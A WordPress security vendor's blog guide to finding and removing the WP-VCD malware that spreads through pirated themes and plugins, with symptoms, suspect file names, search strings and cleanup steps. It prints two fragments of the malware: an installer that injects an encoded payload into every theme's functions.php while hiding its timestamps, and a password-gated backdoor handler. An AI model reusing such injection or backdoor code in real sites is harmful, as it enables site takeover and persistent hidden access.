How to remove WP-VCD malware in WordPress easily [Guide]

Updated on

WP-VCD WordPress Malware Removal

Using WordPress as a CMS has great advantages while carrying web development projects, since it has a large market share whose community is increasing.

However, this popularity has a B side and it also makes the platform susceptible to numerous attacks, bots or malware.

Most of them are not very serious, but they can cause more than a headache when the infestation is replicated throughout your network.

Virus and malware for WordPress there are plenty, but none is more widespread than WP-VCD WordPress Malware.

Without a doubt, the WPVCD malware in site or theme & plugins is most widespread and the one that more WordPress installations manage to infect year after year.

And the most important thing is that in most cases, the person responsible for your WordPress being affected by the WPVCD WordPress malware injection is yourself!

Is your website showing the following symptoms:

Then, there is a high chance that your wordpress site is infected with WP-VCD malware.

Yes, WP-VCD spreads through pirated plugins or themes that are downloaded from unofficial and unreliable sites. For more info: See – How to Scan & Detect Malware in nulled WordPress Themes

Removing Wp-Vcd Malware Attack in WordPress

One thing, if you see the word NULLED in a paid product, such as the popular WordPress theme Divi, it doesn’t mean a trial version, nor a free one.

All these options are pirated or nulled, whatever you want to call them, but if you use them you have a very high percentage of facing WP-VCD in the first place.

Most of us after making some updates and changes into themes or plugin may have found in the function file a code segment that was not created by you at all. Before you, there is a new enemy: the WP-VCD wordpress malware.

It is a type of malicious code that in a short time has become quite common in WordPress installations and is used to generate spam URLs with which to derive traffic from your site to these new routes.

A common technique within the black hat SEO.

If you have also encountered this situation and do not know where to start, stay here because we are going to give some indications on how to remove wordpress wp-vcd malware easily from your site, theme or plugins?

On the other hand, if you are not a developer and need professional help to remove malware in WordPress, you can contact our experts through the contact form by giving them all the details of your situation.

We will respond to your query during business hours as soon as possible.

What is WordPress WP-VCD Malware?

function.php file after attack WP-VCD-malware

The malware known by the name “wp-VCD” continues to infect WordPress code through the known “themes” available on the platform.

WP-VCD malware hides in legitimate WordPress files and is used to add an admin user.

The malware was first seen in the summer of 2017 by Italian security researcher Manuel D’Orso.

The initial version of this threat was uploaded via a wp include file call wp-vcd.php, hence Malware name and malicious code is injected into WordPress core files like functions.php and class.wp.php. This was not a massive campaign, but the attacks continued throughout the past few months.

In previous months, Manuel D’Orso, an Italian researcher, discovered the malware, which was hidden in legitimate files on the platform in order to add a secret administrator and to allow attackers control over infected portals. This virus injected malicious code into major files such as class.wp.php and functions.php.

It was believed that with the new updates this problem had already disappeared, however, a security team discovered another variation of the malware, which injects code into default WordPress themes, including those from 2015 and 2016.

As the themes are something that is not changed very often, it is believed that there are still many sites infected with it.

Infected wordpress themes have been known to be twentyfifteen and twentysixteen. This malware breaks the files and allows you to create a new user named 100010010, and with this obtain the necessary permissions to take control of the platform, but according to the statements of the researchers, these attacks were carried out at later dates.

WP-VCD malware is a malicious code that comes bundled with illegitimate versions of a paid theme/plugin. These pirated themes and plugins incorporate malicious scripts that get inserted once you install them.

Once leaked to your website though a nulled theme, it starts spreading to infect other themes on your site and even proliferates to infect every unprotected site hosted on the shared server.

If you’ll look for “Free [pugin name] download” on Google search bar, it’s almost certain that the top results would be of the WP-VCD malware distributing sites. This often traps web developers & designers into installing the malware.

Resource: Read this comprehensive whitepaper analyzing WP-VCD. This whitepaper by wordfence is intended as a resource for threat analysts, security researchers, WordPress developers and administrators, and anyone else interested in tracking or preventing the behavior associated with WP-VCD.

An example of the WP-VCD malicious script is below:

$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
 $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';

$ping = true;
 $ping2 = false;
 if ($list = scandir( $themes ))
 foreach ($list as $_)

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
 $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
 if (strpos($content, 'WP_V_CD') === false)
 $content = $install_code . $content ;
 @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
 touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
 $ping = false;


 $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
 foreach ($list2 as $_2)

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
 $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
 if (strpos($content, 'WP_V_CD') === false)
 $content = $install_code . $content ;
 @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
 touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
 $ping2 = true;
The code snippet below was sourced from an infected functions.php file on a site compromised by WP-VCD. 
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474'))
switch ($_REQUEST['action'])
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))

What are the symptoms of WP-VCD malware?

  • Addition of a new WordPress administrator without your intervention.
  • Suspension of your WordPress account by your hosting provider in order to safeguard other websites from WP_VCD malware attack.
  • Hosting provider suspending your account as a result of undue resource consumption.
  • Presence of SEO spam like Pharma attack or Japanese search results in Google search results.



  • Mysterious JavaScript code in your website source.
  • Your website pages getting redirected to shady websites.
  • Mysterious PHP files in the wp-includes folder of your root directory which are not present in the WordPress GitHub repository.
  • PHP files available in the wp-content/uploads directory and its sub-directories.
  • Popping up of malware scanner flags WP-VCD on your website.


What causes WP-VCD malware attack?

Hackers are constantly striving to attack exploits and vulnerabilities in the WordPress space. Their aim is to find loopholes and then infect the vulnerable sites by seeping the malware.  There may be manifold reasons for WP-VCD hacks. Some of the widely known are:

  1. Use of pirated WordPress themes and plugins: Illegitimate versions of premium and paid WordPress themes, which are also known as Nulled Themes, are the most widely source of malware transmission by the hackers. The hackers bundle malicious script with such themes and plugins which eventually gets injected into WordPress sites once these themes/plugins are deployed.
  2. Deployment of outdated WordPress plugins and themes at your site, whose development is restricted or stopped.
  3. Missing Firewall on your WordPress site to counter hacking strategies by hackers.

How does WP-VCD affect your site?

Once WP-VCD hack is injected in your WordPress site, hackers take control of your server processes to execute their malicious tasks. This may have serious repercussions like weakening of your website performance as well as other websites running from the same server.

There are several ways in which your website may have been exposed to this virus, although the most common would be:

  1. They have entered your site through vulnerability. This security gap may be found in WordPress itself, although it is most likely in the theme or one of the installed plugins.
  2. We have  a theme or a plugin that incorporates the WP-VCD malware in question. It is quite common to happen with Nulled versions of paid themes or plugins. In this case, you are the one who infects the web without being aware of it.
  3. Your project is in a shared webspace where other web pages can access and one or more of them is infected. The happy script likes to replicate itself on all the websites it has at hand.

More adversely, Google will blacklist your site to safeguard visitors from visiting your website infected with WP-VCD malicious content.

Your site infected with WP-VCD hack becomes more prone to hacker’s mala fide intentions and they take advantage of admin privileges and backdoor created by the malware. This opens all doors to hackers to manipulate the entire website.

This enables the hackers to create spam URLs on your website for their benefit including sending spam emails, display unwanted advertisements, redirecting traffic, etc.

How to identify a WP-VCD malware infection?

Understanding the problem is very good, but it will never replace the goodness of its resolution. The most important thing at the moment is removing all infections.

To remove the WP-VCD, you will first need to know where it came from. It is very important to identify it if not, you will risk seeing it reappear again.

Have you used a free premium theme/plugin? Then find and delete the file class.plugin-modules.php or class.theme-modules.php. and identify where it is included so as not to see errors on the site.

The malware in question is usually found in five files of our WordPress installation, although sometimes one of the first three is missing. The files it affects are the following:

  1. includes / wp-tmp.php
  2. includes / wp-vcd.php
  3. includes / wp-feed.php
  4. includes / post.php
  5. wp-content / themes / my-theme / functions.php

However, we have to make a clarification, since one thing is malware and another is the installer of it. In order for the virus to spread, they use an installer that injects the code into our files. As you will suppose, to prevent it from replicating again, you will have to delete it too, or cleaning the previous files won’t do much good.

The location of this installer is variable, so we can’t tell you the exact path, but there are some common points that will help you locate them.

  1. Presence of a new WordPress Admin user with the username “100010010” on your site without your involvement.
  2. Match the core files included in wp-admin and wp-includes directory of your website against the original WordPress version by freshly downloading from Examine if files like wp-vcd.php and wp-tmp.tmp have been transmitted into your sites core files.
  3. Evaluate if some pages on your websites are being redirected to unwanted websites, where they are not intended to.
  4. Search for your website credibility on Google and check for presence of any SEO spam such as WordPress Pharma hack or Japanese keyword characters Spam.
  1. Check if your hosting provider has suspended your WordPress account. In such a case, contact them to check if the reason behind this suspension of account is wp-vcd malware attack to protect other websites.
  2. Check if unknown JavaScript code has existed in your website source code:

An unknown Javascript code points to a backdoor of your site. Identifying unknown code from your source code requires technical expertise. It is best to get help from an engineer.

 how to remove wp-vcd malware wordpress

How to remove the WP-VCD malware in WordPress?

With WPHH, the solution is available at the click of a button. Just initiate a scan with WPHH’s malware scanner and get rid of infected files just sitting from the dashboard.

Scan WordPress Theme For MalwareWitness the efficacy of our single-click malware scanner, contact our team of wp security experts.

Also readHow To Remove Malware From WordPress Site

To get rid of WP-VCD wordpress malware manually, please proceed.

Most importantly, analyze the occurrences of the below files/strings on your server and check for their contents.

Run a diff check of the file attributes and contents with the similar files in the WordPress core GitHub repository or theme/plugin directory. You may achieve the results by using either of SSH or IDE or even both.

Approach 1 – Search for files on the server infected with the WP-VCD hack

Search for below, but not limited to these files, on the server which have a high tendency to get infected with the WP-VCD hack

  1. wp-vcd.php and wp-tmp.php files in the wp-includes directory
  2. class.wp.php (generally nested in main theme folder)
  3. class.theme-modules.php
  4. wp-content/themes/*/functions.php (all themes installed on the server including inactive ones)
  5. codexc.txt
  6. code1.php
  7. admin.txt
  8. class.theme-modules.php (in the theme folder)

Approach 2 – Search for string patterns in infected malware files

Search for below string patterns manually or with the use of defined algorithm and remove them, where found in the infected files

  1. tmpcontentx
  2. function wp_tmp_setupx
  3. wp-tmp.php
  4. code.php found in the folder
  5. stripos ($tmpcontent, $wp_auth_key)

Files like wp-vcd.php, wp-tmp.php, class.theme-modules.php can be removed from the server once any reference to them is removed from all the themes’ functions.php file or core WordPress files in the site root.

Assuming your site is backed up and you have access to previous versions, here is what you can do:

Step 1: Get backup of the hacked site and download it.

Step 2: Look for a previous backup version of your site that is completely clean. Download it.

Step 3: Compare the wp-admin and wp-includes files of the two backup versions. Check for wp-vcd.php and wp-tmp.tmp files.

  • Go to the WordPress install directory delete file named wp-includes/wp-vcd.php which contains the malware.
  • Delete all the below mentioned files if found in your WordPress install directory:
  • Open the function.php file to remove the malware code


  1. Use a WordPress firewall plugin to check for any changes made to your core files, specifically into the wp-includes folder.
  2. Your wp-includes folders (or subfolders) should ideally not have PHP files. If you find unusual PHP files, check your website for malware using WP hacked help malware scanner.
  3. In the end, check all your themes and plug-in files stored in the wp-content folder. Compare the files to their original theme/plugin files (can be downloaded from the WordPress repository).

Recommended: All of these methods can be time consuming and risky for a non-expert. To make your job easier, get the help of online WordPress malware scanners which scans your entire site in seconds and offers instant malware removal.

What to do after WP-VCD Malware Removal ?

100% protection is not assured even after WP-VCD malware is removed. There is an important checklist of measures to safeguard the website from likely future hacking attempts.

  • Employ Basic Measures:

–Ensure that you are using most up to date WordPress Core, Plugins and Themes.  Vulnerabilities can creep in outdated plugins making it a potential target for hackers. Remove all undeployed WordPress themes and plugins, whether active or not. Be committed to never use the pirated themes on your site.

  • Clean your entire website:

–Scan your entire website and even server including all pages and database to ensure that it is absolutely clean of all malware.

–Make sure you update your WordPress Core, Plugins and Themes. Outdated plugins

–Install any one of the popular wordpress security plugins that not only run regular automatic malware scans but also keep track of file changes.

  • Keep your Website Protection ON:

Always keep your website protection in working condition. Use a security tool like WP Hacked Help in order to ensure that you are keeping all types of hacks at a bay including but not limited to WP_VCD, Pharma Hack, Brute Force attack, etc.

  • Regularly Monitor for hacks:

Deploy any popular security plugin to constantly scan for malware infection and monitor file changes.

If you’re looking for other ways to protect your website from various WordPress vulnerabilities, here is a comprehensive WordPress security guide.

Doing the correct cleaning, we can remove WP-VCD malware from wordpress site in a relatively simple way. Of course, this will depend on the number of portals affected and your knowledge of WordPress.

Keep in mind that this article is written at a specific time and we are talking about malware that can change over time. You may also need a little insight and check to see if it has spread to other sites or the affected files are different.